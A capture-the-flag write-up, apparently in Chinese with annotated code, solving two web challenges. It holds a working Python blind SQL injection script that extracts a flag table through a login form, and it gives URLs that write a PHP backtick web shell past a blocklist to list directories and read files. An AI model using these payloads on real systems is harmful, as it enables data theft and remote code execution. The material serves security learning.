img

happysql

进入题目，是一个登录框：

image-20210402175109614

使用万能密码测试，发现登录处存在 SQL 注入。

输入:

username: whoami"||0#
password: 123456

报错:

image-20210402175135480

输入:

username: whoami"||1#
password: 123456

登录成功:

image-20210402175210262

可以据此进行 POST 型的 SQL 盲注。

exp:

import requests
import time  # NOTE(review): unused in this script
import string
import binascii

# Boolean-based blind SQL injection PoC against the CTF login form shown above.
# Every POST asks the server one yes/no question ("does the selected value
# start with <prefix>?") and reads the answer from whether the login succeeded.
# Defender's view: the root cause is string-built SQL in login.php, and the fix
# is a parameterized query, not a blocklist. Detection-wise, a burst of
# near-identical POSTs to login.php whose `username` carries `case`/`when`/
# `lpad`/`regexp` and a hex literal is a strong signature for this technique.

result = ''  # characters recovered so far, in order

url = "http://eci-2ze6t3je33wd120vx3kg.cloudeci1.ichunqiu.com/login.php"  # disposable CTF instance
# Injected condition placed in the `username` field. `admin1"` closes the
# quoted string (consistent with the `whoami"||1#` probe above); `/**/` stands
# in for spaces, presumably because plain spaces are rejected — TODO confirm;
# `%23` is `#` and comments out the rest of the query. First `{}` = prefix
# length k, second `{}` = hex literal of the candidate prefix. lpad(..., k, 1)
# keeps the first k characters of the selected value, and `regexp` against a
# pattern of the same length is used as an equality test on that prefix.
payload = 'username=admin1"/**/||case/**/when/**/(lpad(((select/**/group_concat(a.2)/**/from/**/(select/**/2/**/union/**/select/**/*/**/from/**/f1ag)/**/as/**/a)),{},1))/**/regexp/**/{}/**/then/**/1/**/else/**/0/**/end%23&password=1'
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

for k in range(1, 50):  # position being recovered (1-based); 50 is an assumed upper bound on length
    print(k)
    for i in string.printable:
        # Regex metacharacters are skipped rather than escaped, so a value
        # containing any of them would not be recovered by this loop.
        if i in '*+.?|$':
            continue
        # The candidate prefix goes into the SQL as a hex literal (0x...), so
        # the request body contains no quote characters.
        data = payload.format(str(k), '0x' + binascii.b2a_hex((result + i).encode()).decode())
        web = requests.post(url, data, headers=headers)
        # print(data)
        # 'home' in the response body is taken as the logged-in page, i.e. the
        # CASE evaluated to 1 and the guessed prefix is correct — presumably
        # the success page from the earlier screenshot; verify against it.
        if 'home' in web.text:
            result += i
            print(result)
            break

image-20210402175540005

write_shell

进入题目:

<?php
// Challenge source. Error output is suppressed and the script prints its own
// source to the client, which is presumably how the listing above was obtained.
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    // Blocklist filter for a scalar value: aborts the request with "hacker!!!"
    // when the input contains a single quote, a space, an underscore, "php",
    // ";", "~", "^", "+", "eval", "{" or "}" (case-insensitive, /i). Anything
    // else is returned unchanged, so this never sanitizes — it only rejects.
    // Defender's note: a blocklist is not a security boundary for content that
    // is later written into an executable file (see the upload action below);
    // the safe design is to never write client bytes into a *.php file.
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
    // if(preg_match("/'| |_|=|php/",$input)){   // earlier, narrower pattern left in by the author
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
    // Recursive wrapper around check(): walks arrays and runs check() on every
    // leaf scalar. check() either die()s or returns the value untouched, and
    // waf() itself has no return statement, so the assignment on the array
    // branch stores null into a local copy and nothing is handed back to the
    // caller — the only observable effect of calling waf() is the possible die().
    if(is_array($input)){
        foreach($input as $key=>$output){
            $input[$key] = waf($output);
        }
    }else{
        $input = check($input);
    }
}

// Per-client sandbox directory named by the MD5 of the client address; created
// on first visit (the mkdir() result is not checked).
$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        // Reveals the sandbox path to the client.
        echo $dir;
        break;
    case 'upload':
        // Arbitrary file write: the raw `data` query parameter is written to
        // <sandbox>/index.php after only the blocklist in check()/waf() has
        // run. waf() returns nothing, so $data is written exactly as received;
        // the filter can reject but never alter. Writing client-controlled
        // content into a PHP file in a directory the client can presumably
        // request (the `pwd` action hands out the path) is code execution by
        // design; the mitigation is to never give uploads an executable
        // extension or location, not a longer blocklist.
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>

直接使用PHP短标签加反引号执行命令即可。

http://eci-2ze69czhh82f38zcdovv.cloudeci1.ichunqiu.com/?action=upload&data=<?=`ls%09/`?>

image-20210402174932031

http://eci-2ze69czhh82f38zcdovv.cloudeci1.ichunqiu.com/?action=upload&data=<?=`cat%09/!whatyouwantggggggg401.ph""p`?>

image-20210402174959826